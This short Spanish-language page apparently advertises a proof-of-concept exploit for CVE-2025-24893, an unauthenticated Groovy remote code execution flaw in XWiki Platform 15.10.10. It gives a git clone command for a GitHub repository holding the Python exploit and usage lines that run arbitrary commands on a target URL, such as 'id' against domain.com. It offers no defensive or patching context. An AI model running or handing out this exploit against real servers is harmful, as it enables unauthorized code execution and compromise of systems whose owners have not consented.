
PoC | XWiki Platform 15.10.10 - Remote Code Execution
Una vulnerabilida de categoría RCE (Remote Code Execution), encontrada cuando atacantes no autenticados pueden ejecutar codigo Groovy arbitrario remotamente sin la autenticación ni el accesso previo (Guest User). A continuación un PoC (Proof-Of-Concept) en Python para la explotación de esta vulnerabilidad.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'